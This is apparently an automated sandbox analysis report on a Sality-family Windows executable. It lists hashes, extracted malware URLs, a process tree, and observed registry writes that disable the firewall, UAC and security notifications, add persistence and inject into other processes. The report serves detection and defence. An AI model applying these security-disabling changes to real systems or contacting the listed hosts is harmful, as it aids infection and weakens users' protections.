Overview
overview
10Static
static
1050cbb85b16...e6.exe
windows7-x64
1050cbb85b16...e6.exe
windows10-2004-x64
10$PLUGINSDIR/inetc.dll
windows7-x64
3$PLUGINSDIR/inetc.dll
windows10-2004-x64
3$R9/uihost32.exe
windows7-x64
10$R9/uihost32.exe
windows10-2004-x64
10$R9/uihost64.exe
windows7-x64
10$R9/uihost64.exe
windows10-2004-x64
10Analysis
-
max time kernel
35s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 13:02
Behavioral task
behavioral1
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/inetc.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/inetc.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$R9/uihost32.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$R9/uihost32.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
$R9/uihost64.exe
Resource
win7-20240903-en
General
-
Target
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
-
Size
2.3MB
-
MD5
921379bd587ab29da4dc23fb9d47fe36
-
SHA1
e9db1731731503a81a2fdc67ffa005e6aa2a8038
-
SHA256
50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
-
SHA512
90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
-
SSDEEP
49152:dtSuw/yQBQIlFZ4n5gcdRVGTZYf0hrSkW6OoXWr0u3r8t9V808b:hnID2n5pViC8hrRW9X78tjIb
Malware Config
Extracted
sality
http://89.119.67.154/testo5/
http://kukutrustnet777.info/home.gif
http://kukutrustnet888.info/home.gif
http://kukutrustnet987.info/home.gif
http://www.klkjwre9fqwieluoi.info/
http://kukutrustnet777888.info/
Signatures
-
Modifies firewall policy service 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Sality family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 4124 cmd.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Deletes itself 1 IoCs
pid Process 3504 VID001.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk VID001.exe -
Executes dropped EXE 1 IoCs
pid Process 3504 VID001.exe -
Loads dropped DLL 2 IoCs
pid Process 3504 VID001.exe 3504 VID001.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" VID001.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc VID001.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ VID001.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ VID001.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe -
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\K: VID001.exe File opened (read-only) \??\E: VID001.exe File opened (read-only) \??\G: VID001.exe File opened (read-only) \??\H: VID001.exe File opened (read-only) \??\I: VID001.exe File opened (read-only) \??\J: VID001.exe -
pid Process 1608 cmd.exe 2264 ARP.EXE -
resource yara_rule behavioral2/memory/792-1-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-3-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-5-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-8-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-13-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-11-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-6-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-7-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-4-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-15-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-21-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-20-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-22-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-27-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/792-28-0x0000000002490000-0x000000000351E000-memory.dmp upx behavioral2/memory/3504-67-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-68-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-63-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-66-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-62-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-61-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-60-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-64-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-65-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-73-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-74-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-76-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-77-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-78-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-80-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-81-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-82-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-83-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-90-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-92-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-94-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-113-0x0000000002F90000-0x000000000401E000-memory.dmp upx behavioral2/memory/3504-114-0x0000000002F90000-0x000000000401E000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SYSTEM.INI 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VID001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
NSIS installer 4 IoCs
resource yara_rule behavioral2/files/0x0007000000023c8a-25.dat nsis_installer_1 behavioral2/files/0x0007000000023c8a-25.dat nsis_installer_2 behavioral2/files/0x0008000000023c84-75.dat nsis_installer_1 behavioral2/files/0x0008000000023c84-75.dat nsis_installer_2 -
Discovers systems in the same network 1 TTPs 2 IoCs
pid Process 3780 net.exe 392 net.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 3504 VID001.exe 3504 VID001.exe 3504 VID001.exe 3504 VID001.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Token: SeDebugPrivilege 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 792 wrote to memory of 776 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 8 PID 792 wrote to memory of 784 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 9 PID 792 wrote to memory of 336 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 13 PID 792 wrote to memory of 2556 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 42 PID 792 wrote to memory of 2576 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 43 PID 792 wrote to memory of 2684 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 46 PID 792 wrote to memory of 3536 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 56 PID 792 wrote to memory of 3660 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 57 PID 792 wrote to memory of 3840 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 58 PID 792 wrote to memory of 3968 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 59 PID 792 wrote to memory of 4056 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 60 PID 792 wrote to memory of 680 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 61 PID 792 wrote to memory of 3896 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 62 PID 792 wrote to memory of 2524 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 75 PID 792 wrote to memory of 2424 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 76 PID 792 wrote to memory of 3504 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 82 PID 792 wrote to memory of 3504 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 82 PID 792 wrote to memory of 3504 792 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe 82 PID 3504 wrote to memory of 776 3504 VID001.exe 8 PID 3504 wrote to memory of 784 3504 VID001.exe 9 PID 3504 wrote to memory of 336 3504 VID001.exe 13 PID 3504 wrote to memory of 2556 3504 VID001.exe 42 PID 3504 wrote to memory of 2576 3504 VID001.exe 43 PID 3504 wrote to memory of 2684 3504 VID001.exe 46 PID 3504 wrote to memory of 3536 3504 VID001.exe 56 PID 3504 wrote to memory of 3660 3504 VID001.exe 57 PID 3504 wrote to memory of 3840 3504 VID001.exe 58 PID 3504 wrote to memory of 3968 3504 VID001.exe 59 PID 3504 wrote to memory of 4056 3504 VID001.exe 60 PID 3504 wrote to memory of 680 3504 VID001.exe 61 PID 3504 wrote to memory of 3896 3504 VID001.exe 62 PID 3504 wrote to memory of 2524 3504 VID001.exe 75 PID 3504 wrote to memory of 2424 3504 VID001.exe 76 PID 3504 wrote to memory of 776 3504 VID001.exe 8 PID 3504 wrote to memory of 784 3504 VID001.exe 9 PID 3504 wrote to memory of 336 3504 VID001.exe 13 PID 3504 wrote to memory of 2556 3504 VID001.exe 42 PID 3504 wrote to memory of 2576 3504 VID001.exe 43 PID 3504 wrote to memory of 2684 3504 VID001.exe 46 PID 3504 wrote to memory of 3536 3504 VID001.exe 56 PID 3504 wrote to memory of 3660 3504 VID001.exe 57 PID 3504 wrote to memory of 3840 3504 VID001.exe 58 PID 3504 wrote to memory of 3968 3504 VID001.exe 59 PID 3504 wrote to memory of 4056 3504 VID001.exe 60 PID 3504 wrote to memory of 680 3504 VID001.exe 61 PID 3504 wrote to memory of 3896 3504 VID001.exe 62 PID 3504 wrote to memory of 2524 3504 VID001.exe 75 PID 3504 wrote to memory of 2424 3504 VID001.exe 76 -
System policy modification 1 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" VID001.exe
Processes
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:776
-
C:\Windows\system32\fontdrvhost.exe"fontdrvhost.exe"1⤵PID:784
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵PID:336
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2576
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2684
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"2⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:792 -
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"3⤵
- Modifies firewall policy service
- UAC bypass
- Windows security bypass
- Deletes itself
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3504 -
